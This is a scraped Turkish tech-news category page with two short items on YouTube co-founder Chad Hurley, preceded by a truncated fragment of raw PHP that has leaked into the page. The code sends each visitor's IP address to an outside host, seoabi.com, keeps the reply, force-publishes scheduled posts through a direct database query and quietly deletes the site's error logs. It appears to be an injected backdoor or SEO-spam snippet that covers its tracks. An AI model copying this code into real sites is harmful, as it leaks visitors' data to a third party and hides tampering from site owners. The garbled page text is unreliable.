$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> chad hurley | Teknoloji Haberleri

chad hurley kategorisindeki tüm yazılar

Son Yazılar

YouTube’dan servet kazananlar

Google, yıllar önce kimlere, ne kadar büyük servetler kazandırdı; hiç merak ettiniz mi? Google’un YouTube’u satın alma sürecinde kim, ne kadar kazandı? Bu sorunun  cevabını merak ediyorsanız, işte size kısa bir özet… YouTube’un kurucularından Chad Hurley, 2006 yılında gerçekleşen 1.65 milyar dolarlık satıştan 334 milyon dolar kazanmış.

YouTube’u Yapan, Bunu da Yaptı!

YouTube’u kurup Google’a satan zeki girişimciler, şimdi de internet üzerinden kendi derginizi oluşturan bir başka girişimin peşinde. İlk kullananlardan olmak için tıklayın. YouTube’un kurucuları arasında yer alan Chad Hurley ve Steve Chen, video paylaşım sitesini Google’a 1,65 milyar dolara sattıktan sonra farklı girişimlerde yeniden bir araya geldiler.